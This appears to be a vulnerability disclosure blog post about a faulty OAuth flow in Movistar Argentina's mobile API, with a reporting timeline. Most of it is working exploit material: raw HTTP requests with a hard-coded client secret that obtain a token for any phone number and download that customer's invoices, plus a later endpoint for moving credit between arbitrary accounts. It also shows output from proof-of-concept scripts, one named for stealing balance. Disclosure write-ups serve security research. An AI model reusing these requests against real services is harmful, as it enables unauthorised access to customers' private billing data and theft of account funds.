Vulnerability that allows you to download the invoices of any phone number registered at Movistar. It was found using mitmproxy on the mobile Android app, and is the result of a faulty Oauth authentication implementation.

1st step: Obtain an oauth token of the desired user

You must send a request to: https://mi.movistar.com.ar changing the field username for the phone number you wish to download the invoices.

POST /oauth/token HTTP/1.1
Host: mi.movistar.com.ar
x-requested-with: com.services.movistar.ar
content-type: application/x-www-form-urlencoded
content-length: 91

grant_type=mobile&username=1112345678&client_id=appcontainer&client_secret=YXBwY29udGFpbmVy

You will get as a response a JSON document with the access_token which will allow us to build the request to download the invoices. (For security and legibility, the token has been truncated in the following examples)

{
  "access_token": "eyJhbGciOiJIUzI1NiJ9.eyJleHAiOjE0NzE4NDcyODUsInVzZXJfbmFtZSI6Inp0MzFxWWRtQWdTNEN3PT0iLCJzY29wZSI...",
  "token_type": "bearer",
  "expires_in": ...,
  "scope": "read trust write",
  "jti": "..."
}

2nd step: Obtain a list of available periods

Each period available corresponds with an invoice we can download. You will need to send a request to https://mi.movistar.com.ar using the access_token that we got on the previous step, pasting it in the authorization header as follows:

GET /v1/facturacion/periodos HTTP/1.1
Host: mi.movistar.com.ar
authorization: Bearer eyJhbGciOiJIUzI1NiJ9.eyJleHAiOjE0NzE4NDk2NDQsInVzZXJfbmFtZSI6InJ3T3FjSGl6U05...
content-type: application/x-www-form-urlencoded

You will get as response a JSON document listing the available periods.

 {
  "status": 200,
  "date": "2016-08-21 ...",
  "data": [
    {
      ...
      "date": "2016-02-04",
      ...
    },
    {
      ...
      "date": "2016-03-04",
      ...
    },
    ...
  ]
}

From this document, we only care about the date fields of each period, as they will allow us to build the URL to finally download the invoice.

3rd step: Download the invoices!

With the token in hand, and the available periods, we can proceed to download them. To do this, you will need to send a request to the following URL:

https://mi.movistar.com.ar/v1/facturacion/(resumen|comprobante)/<periodo>/pdf/

For example, it we want to download the invoice used in the previous steps:

GET /v1/facturacion/comprobante/2016-03-04/pdf/ HTTP/1.1
Host: mi.movistar.com.ar
authorization: Bearer eyJhbGciOiJIUzI1NiJ9.eyJleHAiOjE0NzE4NDk2NDQsInVzZXJfbmFtZSI6InJ3T3FjSGl6U05...
content-type: application/x-www-form-urlencoded

We get as a response:

Server: Apache-Coyote/1.1
Content-Type: application/pdf
...

And as the body of the response, we will find a PDF document of the requested invoice.

POC

The file bajar_facturas.py contains a sample application automating this process. It will download all available invoices of a given phone number. To execute it, you must first install the necesary Python 3 dependencies:

$ pip install -r requirements.txt

Then, we can proceed to execute the app:

$ ./bajar_facturas.py
Ingrese el numero de telefono: 1112345678
Token: eyJhbGciOiJIUzI1NiJ9.eyJl...
Encontradas facturas para fechas :['2016-02-04', '2016-03-04', ...]
Requesting: https://mi.movistar.com.ar/v1/facturacion/resumen/2016-02-04/paginas
Requesting: https://mi.movistar.com.ar/v1/facturacion/comprobante/2016-02-04/paginas
Creating folder: .../Movistar_Exploit/1112345678/2016-02-04
Requesting: https://mi.movistar.com.ar/v1/facturacion/comprobante/2016-05-04/pdf/
Saving image to: .../Movistar_Exploit/1112345678/2016-05-04/comprobante.pdf
Requesting: https://mi.movistar.com.ar/v1/facturacion/resumen/2016-05-04/pdf/
Saving image to: .../Movistar_Exploit/1112345678/2016-05-04/resumen.pdf
Creating folder: .../Movistar_Exploit/1112345678/2016-06-04
Requesting: https://mi.movistar.com.ar/v1/facturacion/comprobante/2016-06-04/pdf/
Saving image to: .../Movistar_Exploit/1112345678/2016-06-04/comprobante.pdf
Requesting: https://mi.movistar.com.ar/v1/facturacion/resumen/2016-06-04/pdf/
Error al descargar la factura del periodo: 2016-06-04
Creating folder: .../Movistar_Exploit/1112345678/2016-07-04
Requesting: https://mi.movistar.com.ar/v1/facturacion/comprobante/2016-07-04/pdf/
Saving image to: .../Movistar_Exploit/1112345678/2016-07-04/comprobante.pdf
Requesting: https://mi.movistar.com.ar/v1/facturacion/resumen/2016-07-04/pdf/
Saving image to: .../Movistar_Exploit/1112345678/2016-07-04/resumen.pdf
Creating folder: .../Movistar_Exploit/1112345678/2016-08-04
Requesting: https://mi.movistar.com.ar/v1/facturacion/comprobante/2016-08-04/pdf/
Saving image to: .../Movistar_Exploit/1112345678/2016-08-04/comprobante.pdf
Requesting: https://mi.movistar.com.ar/v1/facturacion/resumen/2016-08-04/pdf/

UPDATE: 28/10/2016 - Credit transference

Added in its last update, the mobila app now allows to execute credit transferences between accounts. Using the following API endpoint, we can transfer an arbitrary amount of money out of any 2 accounts given some restrictions of the plans they are paying for are satisfied.

POST /recarga/cargamesaldo HTTP/1.1
Host: mi.movistar.com.ar
authorization: Bearer eyJhbGciOiJIUzI1NiJ9.eyJleHAiOjE0NzE4NDk2NDQsInVzZXJfbmFtZSI6InJ3T3FjSGl6U05...
content-type: application/json

{
        'amount': saldo,
        'destination': destino
 }

In case of a succesful transference, we will get the following as a response body:

{'date': '2016-11-07 ...', 'data': {'responseCode': '000', 'responseMessage': 'OK'}, 'status': 200}

The file robar_saldo.py has a sample app automatizing the previous method, allowing you to input any 2 accounts and an amount, and execute the transference:

$ ./robar_saldo.py
Ingrese el numero de telefono victima: 1141234567
Ingrese el numero de telefono destino: 1141234567
Ingrese el saldo a robar: 1
Token: eyJhbGciOiJIUzI1NiJ9.eyJleHAiOjE0NzkxNz...
Posting request to: https://mi.movistar.com.ar/v1/recarga/cargamesaldo
Response: {'data': {'responseMessage': 'OK', 'responseCode': '000'}, 'date': '2016-11-13 ...', 'status': 200}

Timeline

  • 21/08/2016: First contact with Movistar Argentina via Twitter (@movistararg)
  • 21/08/2016: Customer support says that they will get the report to the developers of the mobile app. (Report was not sent)
  • 22/08/2016: Contact via atencionalclienteonline@telefonica.com. Vulnerability report sent.
  • 29/08/2016: Request of reception.
  • 31/08/2016: Movistar confirms that the report was received, forwarded to the corresponding area, and that they are working on an update.
  • 14/10/2016: After inquiring about the status of the report, Movistar confirms that the vulnerability has been resolved. The GitHub repository is made public.
  • 16/10/2016: Movistar acknowledges the vulnerability, thanks for reporting it, and assures that they are working on a fix.

Screenshots

First contact

22 de Agosto

Answer

22 de Agosto. Respuesta

Update request

29 de Agosto

Answer

31 de Agosto. Respuesta

New update request

14 de Noviembre

Answer informing that it is resolved

14 de Noviembre. Respuesta

Previous Post